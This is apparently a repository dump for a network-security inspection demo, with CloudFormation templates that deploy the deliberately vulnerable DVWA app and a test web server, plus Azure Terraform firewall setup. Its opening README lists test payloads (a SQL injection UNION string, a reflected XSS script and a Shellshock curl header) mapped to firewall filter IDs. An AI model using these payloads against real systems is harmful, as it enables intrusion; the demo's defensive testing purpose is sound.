perform SQL Attacks, you wil need to first configure the application security level to "Low" in order for attacks to work properly. This can be done as follows: 89 | 90 | 1. Login to DVWA application from your browser. You can retrieve the DVWAPublicIP from the "Output" tab of your DVWA CloudFormation stack. The URL would be `http://` 91 | 2. Login to Web Application using following default credentials 92 | Username: `admin` 93 | Password: `password` 94 | 3. Go to DVWA Security menu on the side navigation panel 95 | 4. Set Security Level to "Low" and hit Submit button 96 | 97 | Below are some SQL attacks you can perform on your DVWA server 98 | 99 | | Filter ID | Attack | 100 | | :--------- | :------------------------------------------------------------ | 101 | | 3593 | 1. Go to SSL Injection menu on the side navigation panel
2. Enter `?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit` in "User ID" text box and hit submit | 102 | | 12365 | On your browser, enter `http:///vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E` | 103 | 104 | ### Inbound Attacks 105 | 106 | Inbound attacks could be performed on any publicly accessible webserver. In this case, we can perform a simple Shell Shock attack on our DVWA server 107 | 108 | | Filter ID | Attack | 109 | | :--------- | :----------------------------------------------------------------- | 110 | | 16798 | `curl -H "User-Agent: () { :; }; /bin/eject" http://` | 111 | -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/dvwa.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 129 | Mappings: 130 | RegionMap: 131 | us-east-1: #North Virginia 132 | DvwaAMI: ami-091ed521de20a50c2 133 | us-east-2: #Ohio 134 | DvwaAMI: ami-03d0d38f817e95c6f 135 | us-west-1: #North California 136 | DvwaAMI: ami-0b9e4c39f148b835c 137 | us-west-2: #Oregon 138 | DvwaAMI: ami-0adb84ff1c722394f 139 | af-south-1: #Cape Town 140 | DvwaAMI: ami-0ef071ad81bde0437 141 | ap-east-1: #Hong Kong 142 | DvwaAMI: ami-00d021ed3c5b0f047 143 | ap-south-1: #Mumbai 144 | DvwaAMI: ami-0dc33407bbfb0381b 145 | ap-northeast-1: #Tokio 146 | DvwaAMI: ami-0539984a3053a7c65 147 | ap-northeast-2: #Seoul 148 | DvwaAMI: ami-0a6da91fc1b4c3050 149 | ap-northeast-3: #Osaka 150 | DvwaAMI: ami-04325f0723618d365 151 | ap-southeast-1: #Singapore 152 | DvwaAMI: ami-093e255d56ca99fe0 153 | ap-southeast-2: #Sydney 154 | DvwaAMI: ami-03877a0f8b097ea90 155 | ca-central-1: #Canada 156 | DvwaAMI: ami-0cd5aadd5da8446d7 157 | cn-north-1: # Not created yet 158 | DvwaAMI: ami-038255e61d99fa5b7 159 | cn-northwest-1: # Not created yet 160 | DvwaAMI: ami-038255e61d99fa5b7 161 | eu-central-1: #Frankfurt 162 | DvwaAMI: ami-08b5eadce176a41de 163 | eu-west-1: #Ireland 164 | DvwaAMI: ami-022b465e35144bcf0 165 | eu-west-2: #London 166 | DvwaAMI: ami-067257ddeaaec207f 167 | eu-west-3: #Paris 168 | DvwaAMI: ami-038255e61d99fa5b7 169 | eu-south-1: #Milan 170 | DvwaAMI: ami-01d5f2922f887f140 171 | eu-north-1: #Stockholm 172 | DvwaAMI: ami-0d6ee1c8580224f4e 173 | me-south-1: #Bahrein 174 | DvwaAMI: ami-0db951eb511fd6a03 175 | sa-east-1: #Sao Paulo 176 | DvwaAMI: ami-06e1409820ba1c928 177 | Conditions: 178 | UsingDefaultBucket: !Equals 179 | - !Ref QSS3BucketName 180 | - 'quickstart-network-security' 181 | Resources: 182 | DVWASecurityGroup: 183 | Type: AWS::EC2::SecurityGroup 184 | Properties: 185 | GroupName: "DVWA-SG1" 186 | GroupDescription: "Security group to access DVWA instance" 187 | VpcId: !Ref VPCID 188 | SecurityGroupIngress: 189 | - IpProtocol: tcp 190 | FromPort: 80 191 | ToPort: 80 192 | CidrIp: 0.0.0.0/0 193 | - IpProtocol: tcp 194 | FromPort: 22 195 | ToPort: 22 196 | CidrIp: !Ref DVWARemoteAccessCIDR 197 | SecurityGroupEgress: 198 | - IpProtocol: tcp 199 | FromPort: 0 200 | ToPort: 65535 201 | CidrIp: 0.0.0.0/0 202 | DVWA: 203 | Type: AWS::EC2::Instance 204 | Properties: 205 | ImageId: 206 | Fn::FindInMap: 207 | - RegionMap 208 | - Ref: AWS::Region 209 | - DvwaAMI 210 | InstanceType: !Ref DVWAInstanceType 211 | KeyName: !Ref KeyPairName 212 | Tags: 213 | - Key: Name 214 | Value: DVWA 215 | SubnetId: !Ref PublicSubnet1ID 216 | SecurityGroupIds: 217 | - Ref: DVWASecurityGroup 218 | BlockDeviceMappings: 219 | - DeviceName: /dev/sdm 220 | Ebs: 221 | DeleteOnTermination: true 222 | VolumeSize: !Ref RootVolumeSize 223 | Outputs: 224 | DVWASecurityGroup: 225 | Description: DVWA security group ID. 226 | Value: !Ref DVWASecurityGroup 227 | Export: 228 | Name: !Sub '${AWS::StackName}-DVWASecurityGroupID' 229 | DVWAPublicIP: 230 | Description: DVWA instance Public IP 231 | Value: !GetAtt DVWA.PublicIp 232 | Export: 233 | Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP' 234 | Postdeployment: 235 | Description: See the deployment guide for post-deployment steps. 236 | Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5 -------------------------------------------------------------------------------- /east-west-deployment/templates/dvwa.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 129 | Mappings: 130 | RegionMap: 131 | us-east-1: #North Virginia 132 | DvwaAMI: ami-091ed521de20a50c2 133 | us-east-2: #Ohio 134 | DvwaAMI: ami-03d0d38f817e95c6f 135 | us-west-1: #North California 136 | DvwaAMI: ami-0b9e4c39f148b835c 137 | us-west-2: #Oregon 138 | DvwaAMI: ami-0adb84ff1c722394f 139 | af-south-1: #Cape Town 140 | DvwaAMI: ami-0ef071ad81bde0437 141 | ap-east-1: #Hong Kong 142 | DvwaAMI: ami-00d021ed3c5b0f047 143 | ap-south-1: #Mumbai 144 | DvwaAMI: ami-0dc33407bbfb0381b 145 | ap-northeast-1: #Tokio 146 | DvwaAMI: ami-0539984a3053a7c65 147 | ap-northeast-2: #Seoul 148 | DvwaAMI: ami-0a6da91fc1b4c3050 149 | ap-northeast-3: #Osaka 150 | DvwaAMI: ami-04325f0723618d365 151 | ap-southeast-1: #Singapore 152 | DvwaAMI: ami-093e255d56ca99fe0 153 | ap-southeast-2: #Sydney 154 | DvwaAMI: ami-03877a0f8b097ea90 155 | ca-central-1: #Canada 156 | DvwaAMI: ami-0cd5aadd5da8446d7 157 | cn-north-1: # Not created yet 158 | DvwaAMI: ami-038255e61d99fa5b7 159 | cn-northwest-1: # Not created yet 160 | DvwaAMI: ami-038255e61d99fa5b7 161 | eu-central-1: #Frankfurt 162 | DvwaAMI: ami-08b5eadce176a41de 163 | eu-west-1: #Ireland 164 | DvwaAMI: ami-022b465e35144bcf0 165 | eu-west-2: #London 166 | DvwaAMI: ami-067257ddeaaec207f 167 | eu-west-3: #Paris 168 | DvwaAMI: ami-038255e61d99fa5b7 169 | eu-south-1: #Milan 170 | DvwaAMI: ami-01d5f2922f887f140 171 | eu-north-1: #Stockholm 172 | DvwaAMI: ami-0d6ee1c8580224f4e 173 | me-south-1: #Bahrein 174 | DvwaAMI: ami-0db951eb511fd6a03 175 | sa-east-1: #Sao Paulo 176 | DvwaAMI: ami-06e1409820ba1c928 177 | Conditions: 178 | UsingDefaultBucket: !Equals 179 | - !Ref QSS3BucketName 180 | - 'quickstart-network-security' 181 | Resources: 182 | DVWASecurityGroup: 183 | Type: AWS::EC2::SecurityGroup 184 | Properties: 185 | GroupName: "DVWA-SG1" 186 | GroupDescription: "Security group to access DVWA instance" 187 | VpcId: !Ref VPCID 188 | SecurityGroupIngress: 189 | - IpProtocol: tcp 190 | FromPort: 80 191 | ToPort: 80 192 | CidrIp: 0.0.0.0/0 193 | - IpProtocol: tcp 194 | FromPort: 22 195 | ToPort: 22 196 | CidrIp: !Ref DVWARemoteAccessCIDR 197 | SecurityGroupEgress: 198 | - IpProtocol: tcp 199 | FromPort: 0 200 | ToPort: 65535 201 | CidrIp: 0.0.0.0/0 202 | DVWA: 203 | Type: AWS::EC2::Instance 204 | Properties: 205 | ImageId: 206 | Fn::FindInMap: 207 | - RegionMap 208 | - Ref: AWS::Region 209 | - DvwaAMI 210 | InstanceType: !Ref DVWAInstanceType 211 | KeyName: !Ref KeyPairName 212 | Tags: 213 | - Key: Name 214 | Value: DVWA 215 | SubnetId: !Ref PublicSubnet1ID 216 | SecurityGroupIds: 217 | - Ref: DVWASecurityGroup 218 | BlockDeviceMappings: 219 | - DeviceName: /dev/sdm 220 | Ebs: 221 | DeleteOnTermination: true 222 | VolumeSize: !Ref RootVolumeSize 223 | Outputs: 224 | DVWASecurityGroup: 225 | Description: DVWA security group ID. 226 | Value: !Ref DVWASecurityGroup 227 | Export: 228 | Name: !Sub '${AWS::StackName}-DVWASecurityGroupID' 229 | DVWAPublicIP: 230 | Description: DVWA instance Public IP 231 | Value: !GetAtt DVWA.PublicIp 232 | Export: 233 | Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP' 234 | Postdeployment: 235 | Description: See the deployment guide for post-deployment steps. 236 | Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5 -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/BaseSite.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | ImageId: 8 | Description: Enter the AMI ID of the EC2 instance. 9 | Type: String 10 | AllowIP: 11 | Description: Enter the global IP of the terminal to be tested 12 | Type: String 13 | NeedSSMAccess: 14 | Description: If enabled, SSM access to the instance will be available 15 | Type: String 16 | AllowedValues: [true, false] 17 | # ------------------------------------------------------------# 18 | # Import BaseVPC stack(aws-vpc.template.yaml file) 19 | # ------------------------------------------------------------# 20 | VPCId: 21 | Description: Enter the VPC ID where you want to deploy the EC2 instance. 22 | Type: String 23 | PrivateSubnet1ID: 24 | Description: Enter the Private Subnet ID where you want to deploy the EC2 instance. 25 | Type: String 26 | PublicSubnet1ID: 27 | Description: Enter the Public Subnet ID where you want to deploy the ALB 28 | Type: String 29 | PublicSubnet2ID: 30 | Description: Enter the Public Subnet ID where you want to deploy the ALB 31 | Type: String 32 | 33 | # ------------------------------------------------------------# 34 | # Conditions 35 | # ------------------------------------------------------------# 36 | Conditions: 37 | NeedSSM: 38 | !Equals [true, !Ref NeedSSMAccess] 39 | 40 | Resources: 41 | # ------------------------------------------------------------# 42 | # Resources for when you need SSM Access, Create IAM Role and Instance Profile 43 | # ------------------------------------------------------------# 44 | EC2Role: 45 | Condition: NeedSSM 46 | Type: AWS::IAM::Role 47 | Properties: 48 | Path: / 49 | RoleName: 50 | Fn::Join: 51 | - "" 52 | - - Fn::Select: 53 | - 2 54 | - Fn::Split: 55 | - "-" 56 | - !Ref AWS::StackName 57 | - "-EC2Role" 58 | AssumeRolePolicyDocument: 59 | Version: 2012-10-17 60 | Statement: 61 | - Effect: Allow 62 | Principal: 63 | Service: 64 | - ec2.amazonaws.com 65 | Action: 66 | - sts:AssumeRole 67 | MaxSessionDuration: 3600 68 | ManagedPolicyArns: 69 | - arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM 70 | 71 | InstanceProfile: 72 | Condition: NeedSSM 73 | Type: AWS::IAM::InstanceProfile 74 | Properties: 75 | Path: / 76 | Roles: 77 | - !Ref EC2Role 78 | 79 | # ------------------------------------------------------------# 80 | # Create EC2 Instance 81 | # ------------------------------------------------------------# 82 | EC2Instance: 83 | Type: AWS::EC2::Instance 84 | Properties: 85 | ImageId: !Ref ImageId 86 | InstanceType: t2.micro 87 | SecurityGroupIds: 88 | - !Ref EC2SecurityGroup 89 | IamInstanceProfile: !If 90 | - NeedSSM 91 | - !Ref InstanceProfile 92 | - !Ref AWS::NoValue 93 | SubnetId: !Ref PrivateSubnet1ID 94 | Tags: 95 | - Key: Name 96 | Value: 97 | Fn::Join: 98 | - "" 99 | - - Fn::Select: 100 | - 2 101 | - Fn::Split: 102 | - "-" 103 | - !Ref AWS::StackName 104 | - "-EC2" 105 | UserData: 106 | !Base64 | 107 | #!/bin/bash 108 | amazon-linux-extras install nginx1.12 -y 109 | systemctl start nginx 110 | systemctl enable nginx 111 | 112 | # ------------------------------------------------------------# 113 | # Create 2 Security Group for EC2 Instance and ALB 114 | # ------------------------------------------------------------# 115 | EC2SecurityGroup: 116 | Type: AWS::EC2::SecurityGroup 117 | Properties: 118 | GroupName: 119 | Fn::Join: 120 | - "" 121 | - - Fn::Select: 122 | - 2 123 | - Fn::Split: 124 | - "-" 125 | - !Ref AWS::StackName 126 | - "-EC2-SG" 127 | GroupDescription: Used Web Server 128 | VpcId: !Ref VPCId 129 | SecurityGroupIngress: 130 | - 131 | IpProtocol: tcp 132 | FromPort: 80 133 | ToPort: 80 134 | SourceSecurityGroupId: !Ref ALBSecurityGroup 135 | - 136 | IpProtocol: tcp 137 | FromPort: 443 138 | ToPort: 443 139 | SourceSecurityGroupId: !Ref ALBSecurityGroup 140 | Tags: 141 | - Key: Name 142 | Value: 143 | Fn::Join: 144 | - "" 145 | - - Fn::Select: 146 | - 2 147 | - Fn::Split: 148 | - "-" 149 | - !Ref AWS::StackName 150 | - "-EC2-SG" 151 | ALBSecurityGroup: 152 | Type: AWS::EC2::SecurityGroup 153 | Properties: 154 | GroupName: 155 | Fn::Join: 156 | - "" 157 | - - Fn::Select: 158 | - 2 159 | - Fn::Split: 160 | - "-" 161 | - !Ref AWS::StackName 162 | - "-ALB-SG" 163 | GroupDescription: Used ALB 164 | VpcId: !Ref VPCId 165 | SecurityGroupIngress: 166 | - 167 | IpProtocol: tcp 168 | FromPort: 80 169 | ToPort: 80 170 | CidrIp: !Ref AllowIP 171 | - 172 | IpProtocol: tcp 173 | FromPort: 443 174 | ToPort: 443 175 | CidrIp: !Ref AllowIP 176 | Tags: 177 | - Key: Name 178 | Value: 179 | Fn::Join: 180 | - "" 181 | - - Fn::Select: 182 | - 2 183 | - Fn::Split: 184 | - "-" 185 | - !Ref AWS::StackName 186 | - "-ALB-SG" 187 | 188 | # ------------------------------------------------------------# 189 | # Create ALB (Only HTTP) 190 | # ------------------------------------------------------------# 191 | TargetGroup: 192 | Type: AWS::ElasticLoadBalancingV2::TargetGroup 193 | Properties: 194 | VpcId: !Ref VPCId 195 | Name: 196 | Fn::Join: 197 | - "" 198 | - - Fn::Select: 199 | - 2 200 | - Fn::Split: 201 | - "-" 202 | - !Ref AWS::StackName 203 | - "-TG" 204 | Protocol: HTTP 205 | Port: 80 206 | HealthCheckProtocol: HTTP 207 | HealthCheckPath: "/" 208 | HealthCheckPort: "traffic-port" 209 | HealthyThresholdCount: 5 210 | UnhealthyThresholdCount: 2 211 | HealthCheckTimeoutSeconds: 5 212 | HealthCheckIntervalSeconds: 30 213 | Matcher: 214 | HttpCode: 200 215 | Targets: 216 | - Id: !Ref EC2Instance 217 | Port: 80 218 | InternetALB: 219 | Type: AWS::ElasticLoadBalancingV2::LoadBalancer 220 | Properties: 221 | Name: 222 | Fn::Join: 223 | - "" 224 | - - Fn::Select: 225 | - 2 226 | - Fn::Split: 227 | - "-" 228 | - !Ref AWS::StackName 229 | - "-ALB" 230 | Scheme: internet-facing 231 | LoadBalancerAttributes: 232 | - Key: deletion_protection.enabled 233 | Value: false 234 | - Key: idle_timeout.timeout_seconds 235 | Value: 4000 236 | SecurityGroups: 237 | - !Ref ALBSecurityGroup 238 | Subnets: 239 | - !Ref PublicSubnet1ID 240 | - !Ref PublicSubnet2ID 241 | ALBListenerHTTP: 242 | Type: AWS::ElasticLoadBalancingV2::Listener 243 | Properties: 244 | Port: 80 245 | Protocol: HTTP 246 | DefaultActions: 247 | - TargetGroupArn: !Ref TargetGroup 248 | Type: forward 249 | # - Type: redirect 250 | # RedirectConfig: 251 | # Host: '#{host}' 252 | # Path: '/#{path}' 253 | # Port: 443 254 | # Protocol: HTTPS 255 | # Query: '#{query}' 256 | # StatusCode: HTTP_301 257 | LoadBalancerArn: !Ref InternetALB 258 | 259 | Outputs: 260 | TargetGroupID: 261 | Value: !Ref TargetGroup 262 | Description: Target group ID of ALB 263 | ALBID: 264 | Value: !Ref InternetALB 265 | Description: ID of ALB 266 | HTTPWebSiteURL: 267 | Value: !GetAtt InternetALB.DNSName 268 | Description: URL to access the web server (HTTP) 269 | HostedZoneId: 270 | Value: !GetAtt InternetALB.CanonicalHostedZoneID 271 | Description: Hosted Zone ID of ALB 272 | InstanceProfile: 273 | Condition: NeedSSM 274 | Value: !Ref InstanceProfile 275 | Description: Instance profile to be used for SSM access -------------------------------------------------------------------------------- /demo_terraform/network.tf: -------------------------------------------------------------------------------- 1 | # network.tf 2 | 3 | # Resource Group 4 | resource "azurerm_resource_group" "demo-rg" { 5 | name = "${var.prefix}-resources" 6 | location = var.location 7 | 8 | tags = { 9 | environment = var.demoenv 10 | } 11 | } 12 | 13 | # Create Inspection VNet 14 | resource "azurerm_virtual_network" "inspection-vnet" { 15 | name = "inspection-vnet" 16 | address_space = ["172.31.0.0/16"] 17 | location = var.location 18 | resource_group_name = azurerm_resource_group.demo-rg.name 19 | 20 | tags = { 21 | environment = var.demoenv 22 | } 23 | } 24 | 25 | # Create Hub-Subnets for VMSS NSVA deployment 26 | resource "azurerm_subnet" "management-subnet" { 27 | name = "management-subnet" 28 | resource_group_name = azurerm_resource_group.demo-rg.name 29 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 30 | address_prefixes = ["172.31.0.0/27"] 31 | 32 | } 33 | resource "azurerm_subnet" "inspection-subnet" { 34 | name = "inspection-subnet" 35 | resource_group_name = azurerm_resource_group.demo-rg.name 36 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 37 | address_prefixes = ["172.31.0.32/28"] 38 | } 39 | resource "azurerm_subnet" "sanitized-subnet" { 40 | name = "sanitized-subnet" 41 | resource_group_name = azurerm_resource_group.demo-rg.name 42 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 43 | address_prefixes = ["172.31.0.48/28"] 44 | } 45 | 46 | resource "azurerm_subnet" "workload-subnet" { 47 | name = "workload-subnet" 48 | resource_group_name = azurerm_resource_group.demo-rg.name 49 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 50 | address_prefixes = ["172.31.0.64/27"] 51 | } 52 | 53 | # Load Balancer subnet for VMSS NSVA deployment 54 | resource "azurerm_subnet" "loadbalancer-subnet" { 55 | name = "loadbalancer-subnet" 56 | resource_group_name = azurerm_resource_group.demo-rg.name 57 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 58 | address_prefixes = ["172.31.0.96/27"] 59 | } 60 | 61 | # Create Azure Firewall Subnet 62 | resource "azurerm_subnet" "azure-firewall-subnet" { 63 | name = "AzureFirewallSubnet" 64 | resource_group_name = azurerm_resource_group.demo-rg.name 65 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 66 | address_prefixes = ["172.31.0.128/26"] 67 | } 68 | 69 | # Public IP for Azure Firewall 70 | resource "azurerm_public_ip" "azure-firewall-PublicIP" { 71 | name = "azure-firewall-PublicIP" 72 | location = azurerm_resource_group.demo-rg.location 73 | resource_group_name = azurerm_resource_group.demo-rg.name 74 | allocation_method = "Static" 75 | sku = "Standard" 76 | } 77 | 78 | # Azure Firewall 79 | resource "azurerm_firewall" "azure-firewall" { 80 | name = "azure-firewall" 81 | location = azurerm_resource_group.demo-rg.location 82 | resource_group_name = azurerm_resource_group.demo-rg.name 83 | 84 | tags = { 85 | environment = var.demoenv 86 | } 87 | 88 | ip_configuration { 89 | name = "azure-firewall-PublicIP-configuration" 90 | subnet_id = azurerm_subnet.azure-firewall-subnet.id 91 | public_ip_address_id = azurerm_public_ip.azure-firewall-PublicIP.id 92 | } 93 | } 94 | 95 | # Nat rule collection 96 | resource "azurerm_firewall_nat_rule_collection" "allow-inbound-collection" { 97 | name = "allow-inbound-collection" 98 | depends_on = [ 99 | azurerm_public_ip.azure-firewall-PublicIP 100 | ] 101 | azure_firewall_name = azurerm_firewall.azure-firewall.name 102 | resource_group_name = azurerm_resource_group.demo-rg.name 103 | priority = 100 104 | action = "Dnat" 105 | 106 | rule { 